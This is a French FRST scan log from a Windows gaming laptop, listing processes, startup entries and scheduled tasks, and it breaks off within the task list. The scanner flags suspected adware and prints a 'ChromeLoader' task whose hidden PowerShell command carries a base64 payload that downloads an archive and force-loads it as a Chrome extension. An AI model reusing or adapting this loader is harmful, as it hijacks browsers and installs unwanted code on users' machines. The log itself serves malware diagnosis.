Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Exécuté par tibur (administrateur) sur MSI (Micro-Star International Co., Ltd. GL75 Leopard 10SER) (06-01-2022 13:44:33)
Exécuté depuis C:\Users\tibur\Downloads
Profils chargés: tibur
Plate-forme: Microsoft Windows 10 Famille Version 20H2 19042.1288 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(A-Volute SAS -> A-Volute) C:\Users\tibur\AppData\Local\NhNotifSys\nahimic\nahimicNotifSys.exe
(A-Volute SAS -> Nahimic) C:\Windows\System32\NahimicService.exe
(A-Volute SAS -> Nahimic) C:\Windows\System32\NahimicSvc64.exe
(A-Volute SAS -> Nahimic) C:\Windows\SysWOW64\NahimicSvc32.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_ba5b1813656e5c27\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_ba5b1813656e5c27\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3e62be9c39fb0007\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3e62be9c39fb0007\IntelCpHeciSvc.exe
(Intel(R) Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_e43ec0fd38c7d43c\RstMwService.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(LAVASOFT SOFTWARE CANADA INC -> Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe <3>
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_agent.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(ManyCam -> Visicom Media Inc.) C:\ProgramData\ManyCam\Service\ManyCamService.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\fodhelper.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MusNotifyIcon.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\NisSrv.exe
(MICRO-STAR INTERNATIONAL CO., LTD) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.DragonCenter_2.0.75.0_x64__kzh8wxbdkxb8p\DCv2\DCv2.exe
(Micro-Star International CO., LTD. -> ) C:\Program Files (x86)\MSI\MSI NBFoundation Service\Sendevsvc.exe
(Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\MSI NBFoundation Service\MSIAPService.exe
(Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\MSI NBFoundation Service\OmApSvcBroker.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\One Dragon Center\MSI.CentralServer.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\One Dragon Center\MSI_Central_Service.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\LightKeeperService.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\Mystic_Light_Service.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\One Dragon Center\VoiceControl\VoiceControl_Service.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\One Dragon Center\VoiceControl\VoiceControlEngine.exe
(Micro-Star International Co., Ltd.) [Fichier non signé] C:\Windows\SysWOW64\MSIService.exe
(NortonLifeLock Inc. -> Broadcom) C:\Program Files\Norton Security\Engine\22.21.11.46\NortonSecurity.exe <2>
(NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.21.11.46\nsWscSvc.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvmisi.inf_amd64_a3dd6a592ee7bee7\Display.NvContainer\NVDisplay.Container.exe <2>
(Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe
(Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe
(Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper.exe
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper64.exe
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.187.1.13\OverwolfBrowser.exe <3>
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_e9f6c354061743a4\RtkAudUService64.exe <2>
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(TEFINCOM S.A. -> TEFINCOM S.A.) C:\Program Files\NordVPN\nordvpn-service.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_e9f6c354061743a4\RtkAudUService64.exe [1270344 2021-07-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3183328 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM-x32\...\Run: [LeagueDisplays] => C:\Riot Games\LeagueDisplays\assistant\LeagueDisplaysAssistant.exe [406016 2018-10-09] () [Fichier non signé]
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Discord] => C:\Users\tibur\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1802072 2021-12-15] (Overwolf Ltd -> Overwolf Ltd.)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33618400 2021-12-20] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\lghub.exe [136443968 2021-12-08] (Logitech Inc -> Logitech, Inc.)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [BakkesMod] => C:\Program Files\BakkesMod\BakkesMod.exe [15881216 2021-01-05] () [Fichier non signé]
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [8520168 2021-03-05] (LAVASOFT SOFTWARE CANADA INC -> Lavasoft)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Chromium Update] => C:\Users\tibur\AppData\Local\Chromium\Update\1.3.99.0\ChromiumUpdateCore.exe [588800 2021-01-21] (Chromium.) [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\RunOnce: [Application Restart #3] => C:\Windows\SysWOW64\muachost.exe [1692840 2015-08-18] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\SysWOW64\launcher.scr [2417936 2018-10-09] (Riot Games, Inc. -> ) [Fichier non signé]
HKLM\...\Print\Monitors\us008 Langmon: C:\Windows\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-05] (Google LLC -> Google LLC)

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {0148FF4B-8952-464D-A1BA-BCB782D3AE56} - System32\Tasks\Norton Security\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.21.11.46\SymErr.exe [108752 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {08574d8d-db92-458b-abc2-cf6a59c12cc6} - pas de chemin du fichier
Task: {0f8a983d-d3f9-4aaf-8ce0-c38d57654faa} - pas de chemin du fichier
Task: {1367EAFA-04AE-45FA-BA31-C9B499B5AA2F} - System32\Tasks\WebDiscover Browser Update Task => C:\Program Files\WebDiscoverBrowser\4.28.2\browser.exe --update (Pas de fichier) <==== ATTENTION
Task: {16934497-0b98-468d-abca-ab7ca17b245d} - pas de chemin du fichier
Task: {185701D8-12F5-45BE-A386-879B6D58EBE8} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrACIACgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAAKACQAZABkACAAPQAgADAACgAkAHYAZQByACAAPQAgADAACgAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAHQAZQByACAAIgBuAGEAbQBlAD0AJwBjAGgAcgBvAG0AZQAuAGUAeABlACcAIgApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkAaQBmACgAJABfACAALQBNAGEAdABjAGgAIAAiAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgAiACkAewAKAAkACQBiAHIAZQBhAGsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxAAoAfQAKAAoAaQBmACgAJABpAHMATwBwAGUAbgApAHsACgAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgApACkAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAH0AYwBhAHQAYwBoAHsACgAJAAkACQBiAHIAZQBhAGsACgAJAAkAfQAKAAoACQAJAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0ATABpAHQAZQByAGEAbABQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAoACQB9AAoACQBlAGwAcwBlAHsACgAKAAkACQB0AHIAeQB7AAoACQAJAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACIAJABjAG8AbgBmAFAAYQB0AGgAIgApAAoACQAJAAkAewAKAAkACQAJAAkAJABjAG8AbgBmACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAYwBvAG4AZgBQAGEAdABoAAoACQAJAAkACQAkAGMAbwBuAGYALgBTAHAAbABpAHQAKAAiADsAIgApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAAkACQAJAAkAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAZABkACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJABkAGQAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AGUAbABzAGUAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIARQB4AHQAZQBuAHMAaQBvAG4AVgBlAHIAcwBpAG8AbgAiACkACgAJAAkACQAJAAkAewAKAAkACQAJAAkACQAJACQAdgBlAHIAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZABkACAALQBhAG4AZAAgACQAdgBlAHIAKQB7AAoACgAKAAkACQAJAHQAcgB5AHsACgAKAAkACQAJAAkAJAB1AG4AIAA9ACAAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvACQAZABvAG0AYQBpAG4ALwB1AG4APwBkAGkAZAA9ACQAZABkACYAdgBlAHIAPQAkAHYAZQByACIACgAKAAkACQAJAAkAaQBmACgAJAB1AG4AIAAtAE0AYQB0AGMAaAAgACIAJABkAGQAIgApAHsACgAJAAkACQAJAAkAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAJAB0AGEAcwBrAE4AYQBtAGUAIgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQAZgBhAGwAcwBlAAoACQAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAGMAdQByAHMAZQAKAAkACQAJAAkAfQAKAAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAKAAkACQAJAH0ACgAJAAkACQBjAGEAdABjAGgAewB9AAoACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACkAewAKAAkACQAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAkACQAJAH0ACgAKAAkACQB9AAoACgAJAH0ACgAKAAkAdAByAHkAewAKAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIABjAGgAcgBvAG0AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AQwBsAG8AcwBlAE0AYQBpAG4AVwBpAG4AZABvAHcAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9AAoACQAJAHMAdABhAHIAdAAgAGMAaAByAG8AbQBlACAALQAtAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgA9ACIAJABlAHgAdABQAGEAdABoACIALAAgAC0ALQByAGUAcwB0AG8AcgBlAC0AbABhAHMAdAAtAHMAZQBzAHMAaQBvAG4ALAAgAC0ALQBuAG8AZQByAHIAZABpAGEAbABvAGcAcwAsACAALQAtAGQAaQBzAGEAYgBsAGUALQBzAGUAcwBzAGkAbwBuAC0AYwByAGEAcwBoAGUAZAAtAGIAdQBiAGIAbABlAAoACQB9AGMAYQB0AGMAaAB7AH0ACgAKAH0A /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4303 caractères en plus). (Pas de fichier) <==== ATTENTION
Task: {1A41221E-B976-4DD0-8F01-3D71341DAF2E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-08-30] (Google LLC -> Google LLC)
Task: {1b2d43b0-ade2-45d3-96f8-85837d2a7b1f} - pas de chemin du fichier
Task: {1D52E08F-DB53-434A-9BAB-856D60DEED72} - System32\Tasks\NahimicSvc64Run => C:\Windows\system32\NahimicSvc64.exe [1088640 2021-05-27] (A-Volute SAS -> Nahimic)
Task: {20e4e922-0318-48ab-85b9-539292f50e4f} - pas de chemin du fichier
Task: {21F52711-46EF-4A7F-90DF-A913755C1DAD} - System32\Tasks\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001Core => C:\Users\tibur\AppData\Local\Chromium\Update\ChromiumUpdate.exe [100352 2021-01-21] (Chromium.) [Fichier non signé] <==== ATTENTION
Task: {2661757F-6017-4BDC-92C1-1D358A658513} - System32\Tasks\iTop Screen Recorder Startup => C:\Program Files (x86)\iTop Screen Recorder\IScrRec.exe /autorun (Pas de fichier)
Task: {2848052D-68D8-40F1-9FD5-CE6D475AE55A} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\9.0.1\AutoUpdate.exe /auto (Pas de fichier)
Task: {292cbfd4-2a0a-4644-a01a-2fb5fb18edd8} - pas de chemin du fichier
Task: {30FCD97D-E51B-412D-B62B-48BDF5ED0B34} - System32\Tasks\iTopVPN_Scheduler_tibur => C:\Program Files (x86)\iTop VPN\iTopVPN.exe /autostart (Pas de fichier)
Task: {33B2AF87-E6A6-4ABD-9C49-CA4CB2BFEEA8} - System32\Tasks\iTop Screenshot Update => C:\Program Files (x86)\iTop Screenshot\AutoUpdate.exe /auto (Pas de fichier)
Task: {386e1974-844f-4c28-8a49-d0f0257175fd} - pas de chemin du fichier
Task: {3fadb0ef-ae5c-49e4-8ef1-7d9a66e6c9cb} - pas de chemin du fichier
Task: {413eb659-5bd1-408f-9653-e7a01792d867} - pas de chemin du fichier
Task: {49ea9ebb-3064-472d-98fd-752fa8919aa7} - pas de chemin du fichier
Task: {4ED21788-683A-4713-BF2D-BBEEFC059A9C} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {515EB30F-0378-4DB3-B1BC-DA02E6912813} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2353000 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {5375B9BE-49D9-4D73-AF76-C4EFD801FC6C} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339120 2021-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {544AC9F0-E76F-4490-A7C7-609A23DC64B3} - System32\Tasks\MSISW_Host => C:\Windows\SysWOW64\muachost.exe [1692840 2015-08-18] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
Task: {551EACA7-4BC7-4209-8633-C668744FCFE1} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {57C592B5-A6CF-4238-B24E-D4A6B96870A9} - System32\Tasks\iTop Screenshot SkipUAC (tibur) => C:\Program Files (x86)\iTop Screenshot\iScrShot.exe /skipuac (Pas de fichier)
Task: {5F559069-3B2B-455A-85E2-39B93BFA7F7C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2110.6-0\MpCmdRun.exe [901056 2021-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {601f51c0-1ed5-4d8d-b3d1-fc85674d85c2} - pas de chemin du fichier
Task: {60B803DF-470E-46EB-976E-8E144C75E40B} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6241A77A-6FFC-4B26-8F6A-D57DD4C8BB47} - System32\Tasks\MSILEDKeeper2_Host => C:\Program Files (x86)\MSI\One Dragon Center\Mystic_Light\LEDKeeper2.exe [1373360 2020-01-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
Task: {63710016-A304-4577-A629-F3CF973CD6BE} - System32\Tasks\Norton Security\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.21.11.46\SymErr.exe [108752 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {63b68c26-5bd3-4645-8855-0bc0c0950d36} - pas de chemin du fichier
Task: {6BA1FBD7-93FE-4E1D-8704-280705685D05} - System32\Tasks\WebDiscover Browser Launch Task => C:\Program Files\WebDiscoverBrowser\4.28.2\browser.exe --launch --docked (Pas de fichier) <==== ATTENTION
Task: {7192db81-d75a-4c5e-8269-0c3aa4c39900} - pas de chemin du fichier
Task: {732cfaee-b220-45a7-acbf-d6fa7ba38b67} - pas de chemin du fichier
Task: {7B2A9D92-8DB0-496F-8737-F9F253629D2F} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [138600 2021-11-01] (Microsoft Corporation -> Microsoft Corporation)
Task: {7D156DB6-B628-451D-A130-131D10E25781} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [880 2020-09-25] () [Fichier non signé]
